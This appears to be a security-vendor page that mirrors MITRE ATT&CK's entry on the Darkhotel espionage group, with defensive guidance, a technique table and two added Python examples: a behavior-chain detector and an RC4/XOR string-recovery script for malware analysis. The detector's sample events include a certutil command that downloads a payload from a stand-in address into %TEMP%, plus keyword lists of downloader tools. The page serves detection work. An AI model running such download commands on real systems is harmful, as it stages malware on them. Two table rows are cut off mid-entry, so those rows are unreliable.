G0012: Darkhotel
Darkhotel is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group's name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. Darkhotel has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks.[1][2][3]
Analyst context for executives and security teams
Darkhotel matters because ATT&CK describes it as a long-running espionage-focused group associated with targeting traveling executives through hotel Internet networks, as well as spearphishing and peer-to-peer/file-sharing infection paths. For leadership, the decision value is not the name alone; it is whether high-value users, travel workflows, shared content, and endpoint controls are resilient when attacks begin outside the normal corporate perimeter.
Executive priority
Prioritize this as a test of executive protection, user-targeted intrusion readiness, and evidence quality. Ask whether the organization can protect and investigate traveling executives, detect malicious attachments or drive-by compromise, validate code-signing trust decisions, and respond when credentials or sensitive files may have been collected. Because MITRE provides no official detection text for this group, confidence should come from local telemetry, control validation, and incident response exercises rather than assumed coverage.
Technical view
SOC and IR teams should map coverage to the related ATT&CK techniques:
- initial access through drive-by compromise, malicious files, spearphishing attachments, removable media, and tainted shared content;
- execution through client exploitation and the Windows command shell;
- discovery of system, network, process, file, time, and security software details;
- stealth through encoded files, masqueraded resource names, sandbox evasion, deobfuscation, and code signing;
- persistence through Windows Run keys and startup folders;
- collection through keylogging;
- command and control and tool delivery using encrypted traffic and ingress tool transfer.
Validate detections as behavior chains, not single indicators, because the supplied ATT&CK object has no official detection guidance.
Likely telemetry
- Email security and attachment detonation results for targeted spearphishing attachments
- Endpoint process creation, command-line, parent-child process, and script or shell execution logs
- File creation, modification, rename, and directory enumeration telemetry, including shared locations
- Windows Registry Run key and Startup Folder change events where Windows is in scope
- Browser, web proxy, DNS, and network session logs relevant to drive-by compromise and external tool transfer
Detection direction
- Build detections around sequences: initial file/web exposure followed by discovery commands, encoded or renamed payloads, persistence changes, and external file transfer.
- Tune for high-value user context, especially executives and travelers, while avoiding assumptions that every travel network event is malicious.
- Review whether sandbox and malware-analysis workflows account for samples that change behavior based on system checks or user activity checks.
- Validate coverage for signed-but-suspicious binaries; code signing should inform trust decisions, not automatically suppress investigation.
- Monitor shared drives, SaaS shared content, and internal repositories for unexpected executable or script content where Taint Shared Content is relevant.
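To show what a chain-based detection looks like in practice, the following added example (not code from the page, from MITRE, or from any cited vendor) scores constructed Sysmon-style endpoint events per host against the stages listed above: a .rar or .lnk lure dropped in a user-writable path, cmd.exe launching a downloader, discovery commands, and a Run-key write. A host is flagged only when several distinct stages land inside one time window; a high-value user lowers the threshold, but hotel or travel context is never a stage by itself. The host names, user names, file paths, the address 203.0.113.10, the HIGH_VALUE_USERS set, the keyword lists and the thresholds are assumptions made for the demonstration.

```python
"""Behavior-chain scoring for Darkhotel-style intrusions (added example).

Correlates constructed Sysmon-style endpoint events per host into the stages
the page lists and flags a host only when several stages line up in one window.
"""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta

# Assumption: high-value (executive/traveler) accounts. A real deployment would
# pull this from HR or identity data rather than a literal set.
HIGH_VALUE_USERS = {"corp\\jdoe"}

USER_WRITABLE = ("\\downloads\\", "\\temp\\", "\\appdata\\", "\\desktop\\")
DISCOVERY_TOOLS = ("systeminfo", "tasklist", "ipconfig", "hostname", "whoami", "net view")
DOWNLOADERS = ("certutil", "bitsadmin", "downloadfile", "downloadstring", "curl ", "wget ")

# Chain stage -> technique IDs taken from the page's relationship table.
STAGE_TECHNIQUES = {
    "lure_file": ["T1566.001", "T1204.002"],
    "shell_download": ["T1059.003", "T1105"],
    "discovery": ["T1082", "T1057", "T1016"],
    "run_key_persistence": ["T1547.001"],
}


@dataclass(frozen=True)
class Event:
    ts: datetime
    host: str
    user: str
    kind: str          # "file_create" | "process" | "registry"
    image: str = ""    # created file path, or process image
    parent: str = ""   # parent process image (process events)
    cmdline: str = ""  # command line (process events)
    target: str = ""   # registry key path (registry events)


def in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def classify(ev: Event) -> set[str]:
    """Map a single event to the chain stages it evidences (possibly none)."""
    stages: set[str] = set()
    if ev.kind == "file_create":
        if ev.image.lower().endswith((".lnk", ".rar")) and in_user_writable(ev.image):
            stages.add("lure_file")
    elif ev.kind == "process":
        cmd = ev.cmdline.lower()
        if ev.image.lower().endswith("cmd.exe") and any(d in cmd for d in DOWNLOADERS):
            stages.add("shell_download")
        if any(tool in cmd for tool in DISCOVERY_TOOLS):
            stages.add("discovery")
    elif ev.kind == "registry":
        if "\\currentversion\\run" in ev.target.lower():
            stages.add("run_key_persistence")
    return stages


def detect(events: list[Event], window: timedelta = timedelta(minutes=30)) -> dict[str, dict]:
    """Per host, find the window holding the most distinct stages and decide.

    Threshold is 3 distinct stages, lowered to 2 when a high-value user is
    involved: travel context tunes sensitivity, it is never a stage itself.
    """
    by_host: dict[str, list[Event]] = {}
    for ev in events:
        by_host.setdefault(ev.host, []).append(ev)

    results: dict[str, dict] = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e.ts)
        best: set[str] = set()
        for i, start in enumerate(evs):
            seen: set[str] = set()
            for ev in evs[i:]:
                if ev.ts - start.ts > window:
                    break
                seen |= classify(ev)
            if len(seen) > len(best):
                best = seen
        high_value = any(e.user in HIGH_VALUE_USERS for e in evs)
        threshold = 2 if high_value else 3
        results[host] = {
            "stages": sorted(best),
            "techniques": sorted({t for s in best for t in STAGE_TECHNIQUES[s]}),
            "high_value_user": high_value,
            "flagged": len(best) >= threshold,
        }
    return results


# Constructed sample: an executive laptop showing the full chain, and a developer
# box with an unrelated archive download plus an installer's Run-key write.
T0 = datetime(2024, 5, 6, 9, 0)
SAMPLE_EVENTS = [
    Event(T0, "LT-EXEC01", "corp\\jdoe", "file_create",
          image="C:\\Users\\jdoe\\Downloads\\itinerary.rar"),
    Event(T0 + timedelta(minutes=2), "LT-EXEC01", "corp\\jdoe", "file_create",
          image="C:\\Users\\jdoe\\AppData\\Local\\Temp\\mspaint.lnk"),
    Event(T0 + timedelta(minutes=3), "LT-EXEC01", "corp\\jdoe", "process",
          image="C:\\Windows\\System32\\cmd.exe", parent="C:\\Windows\\explorer.exe",
          cmdline="cmd.exe /c certutil -urlcache -split -f http://203.0.113.10/u.dat %TEMP%\\u.exe"),
    Event(T0 + timedelta(minutes=4), "LT-EXEC01", "corp\\jdoe", "process",
          image="C:\\Windows\\System32\\systeminfo.exe", parent="C:\\Windows\\System32\\cmd.exe",
          cmdline="systeminfo"),
    Event(T0 + timedelta(minutes=6), "LT-EXEC01", "corp\\jdoe", "registry",
          target="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WinUpdate"),
    Event(T0, "LT-DEV02", "corp\\bsmith", "file_create",
          image="C:\\Users\\bsmith\\Downloads\\toolkit.rar"),
    Event(T0 + timedelta(minutes=10), "LT-DEV02", "corp\\bsmith", "registry",
          target="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\VendorAgent"),
]

if __name__ == "__main__":
    for host, verdict in detect(SAMPLE_EVENTS).items():
        print(host, verdict)
```

Run it directly to print one verdict per host: the executive laptop is flagged on four stages, the developer box is not, even though it shows the same Run-key write, because two stages alone do not cross the threshold for a normal account. In production the events come from the EDR or SIEM instead of the constructed list, and the downloader and discovery keyword lists are tuned to what the environment actually runs.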
Mitigation priorities
- Start with protection for high-risk users: hardened endpoints, phishing-resistant authentication, safe travel guidance, and rapid reporting paths for suspicious hotel-network or attachment events.
- Maintain disciplined vulnerability and patch management for client applications because related behavior includes exploitation for client execution and drive-by compromise.
- Restrict and monitor execution from user-writable paths, shared content, removable media, and startup locations where business operations allow.
- Apply least privilege and application control principles to reduce the value of keylogging, command shell abuse, persistence, and tool transfer.
- Review code-signing policy so signed binaries are still subject to behavioral inspection and certificate anomalies can be investigated.
Analyst notes and limits
The supplied ATT&CK object identifies aliases Darkhotel, DUBNIUM, and Zigzag Hail, and describes targeting primarily in East Asia since at least 2004, including hotel Internet operations against traveling executives, spearphishing, and peer-to-peer/file-sharing infection. The relationship set is rich enough to guide defensive validation across initial access, execution, discovery, persistence, collection, command and control, and stealth behaviors, but it should be localized to the organization’s actual platforms and telemetry.
The group object lists no platforms, tactics, labels, or official detection text. Related techniques include platform information, but that does not prove every platform is used in every Darkhotel-related intrusion. This take does not claim current activity, customer exposure, attribution certainty beyond MITRE’s wording, or guaranteed detection coverage.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1518.001 | Security Software Discovery | Darkhotel has searched for anti-malware strings and anti-virus processes running on the system. [2][8] |
| Enterprise | T1497.002 | User Activity Based Checks | Darkhotel has used malware that repeatedly checks the mouse cursor position to determine if a real user is on the system. (Lastline DarkHotel Just In Time Decryption Nov 2015) |
| Enterprise | T1027.013 | Encrypted/Encoded File | Darkhotel has obfuscated code using RC4, XOR, and RSA. [2][7] |
| Enterprise | T1573.001 | Symmetric Cryptography | Darkhotel has used AES-256 and 3DES for C2 communications. [7] |
| Enterprise | T1080 | Taint Shared Content | Darkhotel used a virus that propagates by infecting executables stored on shared drives. [1] |
| Enterprise | T1082 | System Information Discovery | Darkhotel has collected the hostname, OS version, service pack version, and the processor architecture from the victim's machine. [2][7] |
| Enterprise | T1056.001 | Keylogging | Darkhotel has used a keylogger. [1] |
| Enterprise | T1566.001 | Spearphishing Attachment | Darkhotel has sent spearphishing emails with malicious RAR and .LNK attachments. [2][7] |
| Enterprise | T1057 | Process Discovery | Darkhotel malware can collect a list of running processes on a system. [2] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Darkhotel has decrypted strings and imports using RC4 during execution. [2][7] |
| Enterprise | T1189 | Drive-by Compromise | Darkhotel used embedded iframes on hotel login portals to redirect selected victims to download malware. [1] |
| Enterprise | T1091 | Replication Through Removable Media | Darkhotel's selective infector modifies executables stored on removable media as a method of spreading across computers. [1] |
| Enterprise | T1497 | Virtualization/Sandbox Evasion | Darkhotel malware has employed just-in-time decryption of strings to evade sandbox detection. (Lastline DarkHotel Just In Time Decryption Nov 2015) |
| Enterprise | T1497.001 | System Checks | Darkhotel malware has used a series of checks to determine if it's being analyzed; checks include the length of executable names, if a filename ends with |
| Enterprise | T1124 | System Time Discovery | Darkhotel malware can obtain system time from a compromised host. (Lastline DarkHotel Just In Time Decryption Nov 2015) |
| Enterprise | T1553.002 | Code Signing | |
| Enterprise | T1016 | System Network Configuration Discovery | Darkhotel has collected the IP address and network adapter information from the victim's machine. [2][7] |
| Enterprise | T1083 | File and Directory Discovery | Darkhotel has used malware that searched for files with specific patterns. [7] |
| Enterprise | T1059.003 | Windows Command Shell | Darkhotel has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file. [2] |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location | Darkhotel has used malware that is disguised as a Secure Shell (SSH) tool. [8] |
| Enterprise | T1105 | Ingress Tool Transfer | Darkhotel has used first-stage payloads that download additional malware from C2 servers. [8] |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder | Darkhotel has been known to establish persistence by adding programs to the Run Registry key. [1] |
| Enterprise | T1203 | Exploitation for Client Execution | Darkhotel has exploited Adobe Flash vulnerability CVE-2015-8651 for execution. [8] |
| Enterprise | T1204.002 | Malicious File | Darkhotel has sent spearphishing emails in an attempt to lure users into clicking on a malicious attachment. [2][7] |
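The RC4, XOR and deobfuscation rows (T1027.013, T1140) describe strings and imports that exist in clear text only while the sample runs. The following added example, which is not code from the page or from any of the cited reports, shows the analyst-side counterpart: candidate RC4 keys and every single-byte XOR key are tried against a packed string table, and each attempt is ranked by printable-byte ratio plus a bonus for recognizable Windows API names, so the right transform stands out without eyeballing 256 dumps. The string table, the key b'h0t3l', the candidate key list and the scoring weights are constructed for this demonstration; a real candidate list comes from constants next to the sample's decryption loop or from its configuration blob.

```python
"""Recovering RC4/XOR-obscured strings from a sample (added example).

Candidate keys are tried against a packed string table and ranked by how much
readable text and how many Windows API names each attempt produces.
"""
from __future__ import annotations

import string

# API names loaders commonly resolve at run time; used only as a scoring hint.
KNOWN_API_NAMES = ("LoadLibraryA", "GetProcAddress", "InternetOpenA",
                   "InternetReadFile", "WinExec", "RegSetValueExA")
PRINTABLE = set(string.printable.encode()) - {0x0B, 0x0C}


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_single(key: int, data: bytes) -> bytes:
    return bytes(b ^ key for b in data)


def score(candidate: bytes) -> float:
    """Printable-byte ratio plus 0.5 per known API name found (assumed weights)."""
    if not candidate:
        return 0.0
    ratio = sum(1 for b in candidate if b in PRINTABLE) / len(candidate)
    return ratio + 0.5 * sum(1 for n in KNOWN_API_NAMES if n.encode() in candidate)


def recover_strings(blob: bytes, rc4_keys, xor_keys=range(256)) -> tuple[str, bytes]:
    """Return (transform label, plaintext) for the best-scoring candidate."""
    best_label, best_pt, best_score = "", b"", 0.0
    attempts = [(f"rc4:{k!r}", rc4(k, blob)) for k in rc4_keys]
    attempts += [(f"xor:0x{k:02x}", xor_single(k, blob)) for k in xor_keys]
    for label, pt in attempts:
        s = score(pt)
        if s > best_score:
            best_label, best_pt, best_score = label, pt, s
    return best_label, best_pt


def split_table(pt: bytes) -> list[str]:
    """NUL-separated string table -> list of strings."""
    return [s.decode("ascii", "replace") for s in pt.split(b"\x00") if s]


# Constructed stand-in for a sample's packed string table (the page carries no
# real blob): import names plus a C2 path, NUL-separated, protected with an
# assumed RC4 key in one copy and a single-byte XOR in another.
PLAIN_TABLE = b"\x00".join([b"LoadLibraryA", b"GetProcAddress", b"InternetOpenA",
                            b"InternetReadFile", b"WinExec", b"/update/check.php"]) + b"\x00"
ASSUMED_RC4_KEY = b"h0t3l"
RC4_BLOB = rc4(ASSUMED_RC4_KEY, PLAIN_TABLE)
XOR_BLOB = xor_single(0x5A, PLAIN_TABLE)
# Hypothetical candidate list; in real work these come from constants next to
# the decryption loop or from a config blob in the binary.
CANDIDATE_RC4_KEYS = [b"password", b"1234", b"h0t3l", b"update"]

if __name__ == "__main__":
    for blob in (RC4_BLOB, XOR_BLOB):
        label, pt = recover_strings(blob, CANDIDATE_RC4_KEYS)
        print(label, split_table(pt))
```

The API-name bonus is what makes the ranking robust: a wrong XOR key can still produce a high printable ratio on text-like input, but it cannot produce an intact API name, so the bonus only ever lands on the correct transform. The same scoring loop extends to other reversible schemes the sample might use (multi-byte XOR, rolling keys) by adding attempts, without touching the ranking.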
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the ATT&CK resources page (Updates).
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 3.0 | | Current bundle | 520ca8dca182… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Kaspersky Darkhotel: Kaspersky Lab's Global Research and Analysis Team. (2014, November). The Darkhotel APT: A Story of Unusual Hospitality. Retrieved November 12, 2014.
- [2] Securelist Darkhotel Aug 2015: Kaspersky Lab's Global Research & Analysis Team. (2015, August 10). Darkhotel's attacks in 2015. Retrieved November 2, 2018.
- [3] Microsoft Digital Defense FY20 Sept 2020: Microsoft. (2020, September 29). Microsoft Digital Defense Report FY20. Retrieved April 21, 2021.
- [4] DUBNIUM (alias record): cites [3], [8], [6], [7].
- [5] Darkhotel (alias record): cites [1].
- [6] Microsoft DUBNIUM Flash June 2016: Microsoft. (2016, June 20). Reverse-engineering DUBNIUM's Flash-targeting exploit. Retrieved March 31, 2021.
- [7] Microsoft DUBNIUM July 2016: Microsoft. (2016, July 14). Reverse engineering DUBNIUM: Stage 2 payload analysis. Retrieved March 31, 2021.
- [8] Microsoft DUBNIUM June 2016: Microsoft. (2016, June 9). Reverse-engineering DUBNIUM. Retrieved March 31, 2021.
- [9] Microsoft Threat Actor Naming July 2023: Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
- [10] Zigzag Hail (alias record): cites [9].
- [11] mitre-attack G0012: MITRE ATT&CK source record for group G0012.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.